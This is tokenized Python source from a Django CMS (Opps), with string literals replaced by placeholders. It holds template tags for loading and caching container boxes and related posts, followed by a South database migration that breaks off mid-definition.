assignment_tag ( takes_context = True ) <EOL> def load_boxes ( context , slugs = None , ** filters ) : <EOL> if slugs : <EOL> filters [ '<STR_LIT>' ] = ordered_slugs = slugs . split ( '<STR_LIT:U+002C>' ) <EOL> request = context [ '<STR_LIT>' ] <EOL> current_site = getattr ( <EOL> request , <EOL> '<STR_LIT>' , <EOL> Site . objects . get ( pk = settings . SITE_ID ) <EOL> ) <EOL> filters [ '<STR_LIT>' ] = [ current_site ] <EOL> master_site = settings . OPPS_CONTAINERS_SITE_ID or <NUM_LIT:1> <EOL> if current_site . id != master_site : <EOL> filters [ '<STR_LIT>' ] . append ( master_site ) <EOL> filters [ '<STR_LIT>' ] = timezone . now ( ) <EOL> filters [ '<STR_LIT>' ] = True <EOL> boxes = ContainerBox . objects . filter ( ** filters ) . order_by ( '<STR_LIT>' ) <EOL> fallback = getattr ( settings , '<STR_LIT>' , False ) <EOL> exclude_ids = [ ] <EOL> if slugs : <EOL> def ob ( i , o = ordered_slugs ) : <EOL> return ( i . site_id != current_site , i . site_id , o . index ( i . slug ) ) <EOL> boxes = sorted ( boxes , key = ob , reverse = True ) <EOL> for box in boxes : <EOL> if box . queryset : <EOL> results = box . get_queryset ( exclude_ids = exclude_ids ) <EOL> else : <EOL> results = box . ordered_containers ( exclude_ids = exclude_ids ) <EOL> if box . queryset : <EOL> for i in results : <EOL> if i . pk not in exclude_ids and isinstance ( i , Container ) : <EOL> exclude_ids . append ( i . pk ) <EOL> elif fallback : <EOL> for i in results : <EOL> if i . container_id and i . container_id not in exclude_ids : <EOL> exclude_ids . append ( i . container_id ) <EOL> else : <EOL> for i in results : <EOL> if i . pk not in exclude_ids : <EOL> exclude_ids . append ( i . pk ) <EOL> results = { } <EOL> for box in boxes : <EOL> if box . slug not in results : <EOL> results [ box . slug ] = box <EOL> get_request ( ) . container_boxes = results <EOL> return results <EOL> @ register . simple_tag ( takes_context = True ) <EOL> def get_containerbox ( <EOL> context , slug , template_name = None , channel = None , ** extra_context ) : <EOL> request = context [ '<STR_LIT>' ] <EOL> current_site = getattr ( <EOL> request , <EOL> '<STR_LIT>' , <EOL> Site . objects . get ( pk = settings . SITE_ID ) <EOL> ) <EOL> is_mobile = getattr ( request , '<STR_LIT>' , False ) <EOL> cachekey = "<STR_LIT>" . format ( <EOL> slug , <EOL> template_name , <EOL> is_mobile , <EOL> current_site . id <EOL> ) <EOL> render = cache . get ( cachekey ) <EOL> if render : <EOL> return render <EOL> box = getattr ( get_request ( ) , '<STR_LIT>' , { } ) . get ( slug , None ) <EOL> if not box : <EOL> filters = { } <EOL> filters [ '<STR_LIT>' ] = current_site . id <EOL> filters [ '<STR_LIT>' ] = slug <EOL> filters [ '<STR_LIT>' ] = timezone . now ( ) <EOL> filters [ '<STR_LIT>' ] = True <EOL> if channel is not None : <EOL> filters [ '<STR_LIT>' ] = channel <EOL> master_site = settings . OPPS_CONTAINERS_SITE_ID or <NUM_LIT:1> <EOL> try : <EOL> box = ContainerBox . objects . get ( ** filters ) <EOL> except ContainerBox . DoesNotExist : <EOL> box = None <EOL> if current_site . id != master_site and not box or not getattr ( box , '<STR_LIT>' , False ) : <EOL> filters [ '<STR_LIT>' ] = master_site <EOL> try : <EOL> box = ContainerBox . objects . get ( ** filters ) <EOL> except ContainerBox . DoesNotExist : <EOL> box = None <EOL> if not box : <EOL> box = ContainerBox . objects . none ( ) <EOL> t = template . loader . get_template ( '<STR_LIT>' ) <EOL> if template_name : <EOL> t = template . loader . get_template ( template_name ) <EOL> context = { <EOL> '<STR_LIT>' : box , <EOL> '<STR_LIT>' : slug , <EOL> '<STR_LIT>' : context , <EOL> '<STR_LIT>' : request <EOL> } <EOL> context . update ( extra_context ) <EOL> render = t . render ( template . Context ( context ) ) <EOL> cache . set ( cachekey , render , settings . OPPS_CACHE_EXPIRE ) <EOL> return render <EOL> @ register . simple_tag <EOL> def get_all_containerbox ( channel_long_slug = None , template_name = None ) : <EOL> """<STR_LIT>""" <EOL> cachekey = "<STR_LIT>" . format ( <EOL> channel_long_slug , <EOL> template_name ) <EOL> render = cache . get ( cachekey ) <EOL> if render : <EOL> return render <EOL> filters = { } <EOL> filters [ '<STR_LIT>' ] = timezone . now ( ) <EOL> filters [ '<STR_LIT>' ] = True <EOL> filters [ '<STR_LIT>' ] = settings . SITE_ID <EOL> if settings . OPPS_CONTAINERS_SITE_ID : <EOL> filters [ '<STR_LIT>' ] = settings . OPPS_CONTAINERS_SITE_ID <EOL> boxes = ContainerBox . objects . filter ( ** filters ) <EOL> if channel_long_slug : <EOL> boxes = boxes . filter ( channel_long_slug = channel_long_slug ) <EOL> t = template . loader . get_template ( '<STR_LIT>' ) <EOL> if template_name : <EOL> t = template . loader . get_template ( template_name ) <EOL> render = t . render ( template . Context ( { '<STR_LIT>' : boxes } ) ) <EOL> cache . set ( cachekey , render , settings . OPPS_CACHE_EXPIRE ) <EOL> return render <EOL> @ register . simple_tag <EOL> def get_post_content ( post , template_name = '<STR_LIT>' , <EOL> content_field = '<STR_LIT:content>' , related_name = '<STR_LIT>' , <EOL> get_related = True , safe = True , divider = "<STR_LIT>" , <EOL> placeholder = settings . OPPS_RELATED_POSTS_PLACEHOLDER ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( post , content_field ) : <EOL> return None <EOL> content = getattr ( post , content_field , '<STR_LIT>' ) <EOL> content = content . replace ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> if not get_related : <EOL> return content <EOL> related_posts = getattr ( post , related_name , None ) <EOL> if not related_posts . exists ( ) : <EOL> return mark_safe ( content ) <EOL> t = template . loader . get_template ( template_name ) <EOL> related_rendered = t . render ( template . Context ( { <EOL> '<STR_LIT>' : post , related_name : related_posts } ) ) <EOL> if placeholder in content : <EOL> return mark_safe ( content . replace ( <EOL> placeholder , <EOL> related_rendered <EOL> ) ) <EOL> else : <EOL> return mark_safe ( content + divider + related_rendered ) <EOL> @ register . simple_tag <EOL> def get_url ( obj , http = False , target = None , url_only = False ) : <EOL> if not hasattr ( obj , '<STR_LIT>' ) : <EOL> return obj . get_absolute_url ( ) <EOL> try : <EOL> _url = obj . get_absolute_url ( ) <EOL> _target = target or '<STR_LIT>' <EOL> _is_link = obj . child_class == '<STR_LIT>' <EOL> if _is_link and not obj . link . is_local ( ) and not target : <EOL> _target = '<STR_LIT>' <EOL> if http : <EOL> _url = '<STR_LIT>' . format ( <EOL> obj . site , <EOL> obj . get_absolute_url ( ) ) <EOL> if url_only : <EOL> return _url <EOL> return '<STR_LIT>' . format ( _url , _target ) <EOL> except Exception as e : <EOL> logger . error ( "<STR_LIT>" . format ( e ) ) <EOL> return obj . get_absolute_url ( ) <EOL> @ register . assignment_tag <EOL> def get_containers_by ( limit = None , ** filters ) : <EOL> """<STR_LIT>""" <EOL> cachekey = u'<STR_LIT>' . format ( hash ( frozenset ( filters . items ( ) ) ) ) <EOL> _cache = cache . get ( cachekey ) <EOL> if _cache : <EOL> return _cache <EOL> site = settings . SITE_ID <EOL> if settings . OPPS_CONTAINERS_SITE_ID : <EOL> site = settings . OPPS_CONTAINERS_SITE_ID <EOL> qs = Container . objects . all_published ( ) <EOL> qs = qs . filter ( site = site , ** filters ) <EOL> qs = qs [ : limit ] <EOL> containers = [ i for i in qs ] <EOL> cache . set ( cachekey , containers , settings . OPPS_CACHE_EXPIRE ) <EOL> return containers <EOL> @ register . assignment_tag <EOL> def filter_queryset_by ( queryset , ** filters ) : <EOL> """<STR_LIT>""" <EOL> if not getattr ( queryset , '<STR_LIT>' , False ) : <EOL> return queryset <EOL> cachekey = u'<STR_LIT>' . format ( hash ( unicode ( queryset . query ) ) ) <EOL> _cache = cache . get ( cachekey ) <EOL> if _cache : <EOL> return _cache <EOL> found_in_lookup = None <EOL> for key in filters . keys ( ) : <EOL> if '<STR_LIT>' in key : <EOL> found_in_lookup = key <EOL> if found_in_lookup : <EOL> filters [ found_in_lookup ] = filters [ found_in_lookup ] . split ( '<STR_LIT:U+002C>' ) <EOL> if not queryset . query . can_filter ( ) : <EOL> ids = [ i . id for i in queryset ] <EOL> queryset = queryset . model . objects . filter ( id__in = ids ) . filter ( ** filters ) <EOL> return queryset <EOL> containers = queryset . filter ( ** filters ) <EOL> cache . set ( cachekey , containers , settings . OPPS_CACHE_EXPIRE ) <EOL> return containers <EOL> @ register . assignment_tag <EOL> def exclude_queryset_by ( queryset , ** excludes ) : <EOL> """<STR_LIT>""" <EOL> if not getattr ( queryset , '<STR_LIT>' , False ) : <EOL> return queryset <EOL> cachekey = u'<STR_LIT>' . format ( hash ( unicode ( queryset . query ) ) ) <EOL> _cache = cache . get ( cachekey ) <EOL> if _cache : <EOL> return _cache <EOL> found_in_lookup = None <EOL> for key in excludes . keys ( ) : <EOL> if '<STR_LIT>' in key : <EOL> found_in_lookup = key <EOL> if found_in_lookup : <EOL> excludes [ found_in_lookup ] = excludes [ found_in_lookup ] . split ( '<STR_LIT:U+002C>' ) <EOL> if not queryset . query . can_filter ( ) : <EOL> ids = [ i . id for i in queryset ] <EOL> containers = queryset . model . objects . filter ( id__in = ids ) . exclude ( <EOL> ** excludes <EOL> ) <EOL> else : <EOL> containers = queryset . exclude ( ** excludes ) <EOL> if '<STR_LIT>' in excludes : <EOL> bad_child_class = excludes [ '<STR_LIT>' ] <EOL> mirrors = Mirror . objects . filter ( <EOL> container__child_class = bad_child_class <EOL> ) . values_list ( '<STR_LIT:id>' , flat = True ) <EOL> if mirrors : <EOL> containers = containers . exclude ( pk__in = mirrors ) <EOL> cache . set ( cachekey , containers , settings . OPPS_CACHE_EXPIRE ) <EOL> return containers <EOL> @ register . assignment_tag <EOL> def get_container_by_channel ( slug , number = <NUM_LIT:10> , depth = <NUM_LIT:1> , <EOL> include_children = True , ** kwargs ) : <EOL> box = None <EOL> magic_date = kwargs . pop ( '<STR_LIT>' , False ) <EOL> date = timezone . now ( ) <EOL> if magic_date : <EOL> try : <EOL> date = magicdate ( magic_date ) <EOL> except Exception : <EOL> pass <EOL> splited = dict ( [ <EOL> ( key , value . split ( '<STR_LIT:U+002C>' ) ) <EOL> for key , value <EOL> in kwargs . items ( ) <EOL> if key . endswith ( '<STR_LIT>' ) and type ( value ) is not list ] ) <EOL> kwargs . update ( splited ) <EOL> if include_children : <EOL> k = '<STR_LIT>' <EOL> kwargs [ k ] = cache . get ( <EOL> '<STR_LIT>' . format ( slug ) ) <EOL> if not kwargs [ k ] : <EOL> try : <EOL> channel = Channel . objects . get ( long_slug = slug ) <EOL> qs = channel . get_descendants ( include_self = True ) <EOL> qs = qs . filter ( level__lte = channel . level + depth ) <EOL> kwargs [ k ] = qs . values_list ( "<STR_LIT:id>" , flat = True ) <EOL> cache . set ( <EOL> '<STR_LIT>' . format ( slug ) , <EOL> kwargs [ k ] , <EOL> settings . OPPS_CACHE_EXPIRE ) <EOL> except Channel . DoesNotExist : <EOL> kwargs [ k ] = [ ] <EOL> try : <EOL> kwargs [ '<STR_LIT>' ] = settings . SITE_ID <EOL> if settings . OPPS_CONTAINERS_SITE_ID : <EOL> kwargs [ '<STR_LIT>' ] = settings . OPPS_CONTAINERS_SITE_ID <EOL> kwargs [ '<STR_LIT>' ] = include_children <EOL> kwargs [ '<STR_LIT>' ] = date <EOL> kwargs [ '<STR_LIT>' ] = True <EOL> box = Container . objects . distinct ( ) . filter ( <EOL> ** kwargs ) . order_by ( '<STR_LIT>' ) [ : number ] <EOL> except : <EOL> pass <EOL> return box <EOL> @ register . assignment_tag <EOL> def get_containerbox_by ( ** filters ) : <EOL> """<STR_LIT>""" <EOL> site = settings . SITE_ID <EOL> if settings . OPPS_CONTAINERS_SITE_ID : <EOL> site = settings . OPPS_CONTAINERS_SITE_ID <EOL> return ContainerBox . objects . filter ( site = site , <EOL> published = True , <EOL> date_available__lte = timezone . now ( ) , <EOL> ** filters ) <EOL> @ register . simple_tag ( takes_context = True ) <EOL> def get_containerbox_list ( context , slug , num = <NUM_LIT:0> , template_name = None ) : <EOL> """<STR_LIT>""" <EOL> request = context [ '<STR_LIT>' ] <EOL> cachekey = "<STR_LIT>" . format ( <EOL> slug , <EOL> template_name , <EOL> request . is_mobile , <EOL> ) <EOL> render = cache . get ( cachekey ) <EOL> if render : <EOL> return render <EOL> site = settings . SITE_ID <EOL> if settings . OPPS_CONTAINERS_SITE_ID : <EOL> site = settings . OPPS_CONTAINERS_SITE_ID <EOL> try : <EOL> box = ContainerBox . objects . filter ( <EOL> site = site , slug = slug , <EOL> date_available__lte = timezone . now ( ) , <EOL> published = True ) <EOL> if isinstance ( num , int ) and num > <NUM_LIT:0> and box : <EOL> list_box = box [ <NUM_LIT:0> ] . ordered_box_containers ( ) <EOL> box = [ list_box [ i : i + num ] for i in range ( <NUM_LIT:0> , len ( list_box ) , num ) ] <EOL> except ContainerBox . DoesNotExist : <EOL> box = None <EOL> t = template . loader . get_template ( '<STR_LIT>' ) <EOL> if template_name : <EOL> t = template . loader . get_template ( template_name ) <EOL> render = t . render ( template . Context ( { <EOL> '<STR_LIT>' : box , <EOL> '<STR_LIT>' : slug , <EOL> '<STR_LIT>' : context } <EOL> ) ) <EOL> cache . set ( cachekey , render , settings . OPPS_CACHE_EXPIRE ) <EOL> return render <EOL> @ register . assignment_tag <EOL> def get_custom_field_value ( obj , field_slug ) : <EOL> """<STR_LIT>""" <EOL> if not callable ( getattr ( obj , '<STR_LIT>' ) ) : <EOL> return None <EOL> if not obj . custom_fields ( ) : <EOL> return None <EOL> return obj . custom_fields ( ) . get ( field_slug ) <EOL> @ register . assignment_tag <EOL> def get_postrelated_by ( obj , ** filters ) : <EOL> """<STR_LIT>""" <EOL> if getattr ( obj , '<STR_LIT>' , False ) : <EOL> cachekey = u'<STR_LIT>' . format ( <EOL> hash ( frozenset ( filters . items ( ) ) ) , obj . pk ) <EOL> _cache = cache . get ( cachekey ) <EOL> if _cache : <EOL> return _cache <EOL> queryset = obj . postrelated_post . filter ( post__pk = obj . pk ) <EOL> if '<STR_LIT>' in filters . keys ( ) : <EOL> del filters [ '<STR_LIT>' ] <EOL> containers = [ i . related for i in queryset . exclude ( ** filters ) <EOL> . order_by ( '<STR_LIT>' ) ] <EOL> else : <EOL> containers = [ i . related for i in queryset . filter ( ** filters ) <EOL> . order_by ( '<STR_LIT>' ) ] <EOL> cache . set ( cachekey , containers , settings . OPPS_CACHE_EXPIRE ) <EOL> return containers <EOL> return '<STR_LIT>' </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> from django . contrib . auth import get_user_model <EOL> User = get_user_model ( ) <EOL> class Migration ( SchemaMigration ) : <EOL> def forwards ( self , orm ) : <EOL> db . create_table ( u'<STR_LIT>' , ( <EOL> ( u'<STR_LIT:id>' , self . gf ( '<STR_LIT>' ) ( primary_key = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( auto_now_add = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( auto_now = True , blank = True ) ) , <EOL> ( '<STR_LIT:user>' , self . gf ( '<STR_LIT>' ) ( to = orm [ '<STR_LIT>' % ( User . _meta . app_label , User . _meta . object_name ) ] ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( default = <NUM_LIT:1> , to = orm [ '<STR_LIT>' ] ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( db_index = True , max_length = <NUM_LIT:4> , null = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( db_index = True , max_length = <NUM_LIT:100> , null = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( default = datetime . datetime . now , null = True , db_index = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( default = False , db_index = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( to = orm [ '<STR_LIT>' ] ) ) , <EOL> ( '<STR_LIT:action>' , self . gf ( '<STR_LIT>' ) ( default = '<STR_LIT:message>' , max_length = <NUM_LIT> ) ) , <EOL> ( '<STR_LIT:type>' , self . gf ( '<STR_LIT>' ) ( default = '<STR_LIT>' , max_length = <NUM_LIT:10> ) ) , <EOL> ( '<STR_LIT:message>' , self . gf ( '<STR_LIT>' ) ( ) ) , <EOL> ) ) <EOL> db . send_create_signal ( u'<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> def backwards ( self , orm ) : <EOL> db . delete_table ( u'<STR_LIT>' ) <EOL> models = { <EOL> u'<STR_LIT>' % ( User . _meta . app_label , User . _meta . module_name ) : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : User . __name__ } , <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:1>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT:4>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> u'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" % ( User . _meta . app_label , User . _meta . object_name ) } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : u"<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:1>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT:4>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:source>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" % ( User . _meta . app_label , User . _meta . object_name ) } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:image>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , 